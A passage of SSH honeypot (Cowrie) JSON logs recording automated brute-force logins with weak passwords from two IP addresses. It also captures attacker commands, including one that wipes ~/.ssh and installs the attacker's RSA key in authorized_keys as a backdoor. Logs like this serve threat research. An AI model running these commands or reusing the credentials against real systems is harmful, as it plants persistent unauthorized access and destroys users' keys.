05@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:41:33.920044Z","src_ip":"212.227.235.229","session":"af1f77ce6f87"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"abc123","message":"login attempt [sshd/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:41:35.008054Z","src_ip":"212.227.235.229","session":"af1f77ce6f87"}
{"eventid":"cowrie.session.closed","duration":7.965309381484985,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:41:35.662983Z","src_ip":"212.227.235.229","session":"6cfb593576ce"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:41:36.271996Z","src_ip":"212.227.235.229","session":"af1f77ce6f87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59996,"dst_ip":"1.2.3.4","dst_port":22,"session":"b71fadee2233","protocol":"ssh","message":"New connection: 212.227.235.229:59996 (1.2.3.4:22) [session: b71fadee2233]","sensor":"my-vps","timestamp":"2025-09-09T02:41:40.408978Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:41:40.638855Z","src_ip":"212.227.235.229","session":"b71fadee2233"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60006,"dst_ip":"1.2.3.4","dst_port":22,"session":"eee3ecbd3fd8","protocol":"ssh","message":"New connection: 212.227.235.229:60006 (1.2.3.4:22) [session: eee3ecbd3fd8]","sensor":"my-vps","timestamp":"2025-09-09T02:41:40.869272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:41:41.339181Z","src_ip":"212.227.235.229","session":"eee3ecbd3fd8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T02:41:41.339983Z","src_ip":"212.227.235.229","session":"eee3ecbd3fd8"}
{"eventid":"cowrie.login.success","username":"root","password":"------fuck------","message":"login attempt [root/------fuck------] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:41:44.791571Z","src_ip":"212.227.235.229","session":"eee3ecbd3fd8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:41:45.325598Z","src_ip":"212.227.235.229","session":"eee3ecbd3fd8"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-09-09T02:41:45.326307Z","src_ip":"212.227.235.229","session":"eee3ecbd3fd8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:41:46.575634Z","src_ip":"212.227.235.229","session":"eee3ecbd3fd8"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:41:46.576705Z","src_ip":"212.227.235.229","session":"eee3ecbd3fd8"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11784,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0230b8b7094","protocol":"ssh","message":"New connection: 185.152.45.241:11784 (1.2.3.4:22) [session: c0230b8b7094]","sensor":"my-vps","timestamp":"2025-09-09T02:42:15.589546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:42:15.590442Z","src_ip":"185.152.45.241","session":"c0230b8b7094"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:42:15.647885Z","src_ip":"185.152.45.241","session":"c0230b8b7094"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:42:15.917957Z","src_ip":"185.152.45.241","session":"c0230b8b7094"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:42:16.084781Z","src_ip":"185.152.45.241","session":"c0230b8b7094"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:42:16.085663Z","src_ip":"185.152.45.241","session":"c0230b8b7094"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:42:16.086726Z","src_ip":"185.152.45.241","session":"c0230b8b7094"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:42:16.139159Z","src_ip":"185.152.45.241","session":"c0230b8b7094"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:42:16.249662Z","src_ip":"185.152.45.241","session":"c0230b8b7094"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:42:16.250497Z","src_ip":"185.152.45.241","session":"c0230b8b7094"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:42:16.303840Z","src_ip":"185.152.45.241","session":"c0230b8b7094"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:42:16.304874Z","src_ip":"185.152.45.241","session":"c0230b8b7094"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11786,"dst_ip":"1.2.3.4","dst_port":22,"session":"24330ea71640","protocol":"ssh","message":"New connection: 185.152.45.241:11786 (1.2.3.4:22) [session: 24330ea71640]","sensor":"my-vps","timestamp":"2025-09-09T02:42:16.358650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:42:16.359479Z","src_ip":"185.152.45.241","session":"24330ea71640"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:42:16.428413Z","src_ip":"185.152.45.241","session":"24330ea71640"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:42:16.698721Z","src_ip":"185.152.45.241","session":"24330ea71640"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40378,"dst_ip":"1.2.3.4","dst_port":22,"session":"afa34b4ffa0c","protocol":"ssh","message":"New connection: 212.227.235.229:40378 (1.2.3.4:22) [session: afa34b4ffa0c]","sensor":"my-vps","timestamp":"2025-09-09T02:42:17.736300Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:42:17.736935Z","src_ip":"212.227.235.229","session":"afa34b4ffa0c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:42:17.749135Z","src_ip":"185.152.45.241","session":"24330ea71640"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11782,"dst_ip":"1.2.3.4","dst_port":22,"session":"897757092a1f","protocol":"ssh","message":"New connection: 185.152.45.241:11782 (1.2.3.4:22) [session: 897757092a1f]","sensor":"my-vps","timestamp":"2025-09-09T02:42:17.794395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:42:17.798454Z","src_ip":"185.152.45.241","session":"897757092a1f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:42:17.854881Z","src_ip":"185.152.45.241","session":"897757092a1f"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T02:42:17.943868Z","src_ip":"212.227.235.229","session":"afa34b4ffa0c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:42:18.059353Z","src_ip":"185.152.45.241","session":"897757092a1f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:42:18.114448Z","src_ip":"185.152.45.241","session":"c0230b8b7094"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:42:18.115624Z","src_ip":"185.152.45.241","session":"897757092a1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39096,"dst_ip":"1.2.3.4","dst_port":22,"session":"943f363e918b","protocol":"ssh","message":"New connection: 212.227.235.229:39096 (1.2.3.4:22) [session: 943f363e918b]","sensor":"my-vps","timestamp":"2025-09-09T02:42:22.471884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:42:22.473831Z","src_ip":"212.227.235.229","session":"943f363e918b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:42:22.857966Z","src_ip":"212.227.235.229","session":"943f363e918b"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abc123456","message":"login attempt [ubuntu/abc123456] failed","sensor":"my-vps","timestamp":"2025-09-09T02:42:24.379161Z","src_ip":"212.227.235.229","session":"943f363e918b"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:42:25.737006Z","src_ip":"212.227.235.229","session":"afa34b4ffa0c"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:42:25.766493Z","src_ip":"212.227.235.229","session":"943f363e918b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47757,"dst_ip":"1.2.3.4","dst_port":22,"session":"135e05e9572a","protocol":"ssh","message":"New connection: 212.227.235.229:47757 (1.2.3.4:22) [session: 135e05e9572a]","sensor":"my-vps","timestamp":"2025-09-09T02:42:25.775693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:42:25.776421Z","src_ip":"212.227.235.229","session":"135e05e9572a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:42:26.034031Z","src_ip":"212.227.235.229","session":"135e05e9572a"}
{"eventid":"cowrie.login.failed","username":"dev","password":"qwerty","message":"login attempt [dev/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T02:42:27.087646Z","src_ip":"212.227.235.229","session":"135e05e9572a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:42:28.341728Z","src_ip":"212.227.235.229","session":"135e05e9572a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43174,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a09a822ca5a","protocol":"ssh","message":"New connection: 212.227.235.229:43174 (1.2.3.4:22) [session: 5a09a822ca5a]","sensor":"my-vps","timestamp":"2025-09-09T02:42:34.381817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:42:34.382763Z","src_ip":"212.227.235.229","session":"5a09a822ca5a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 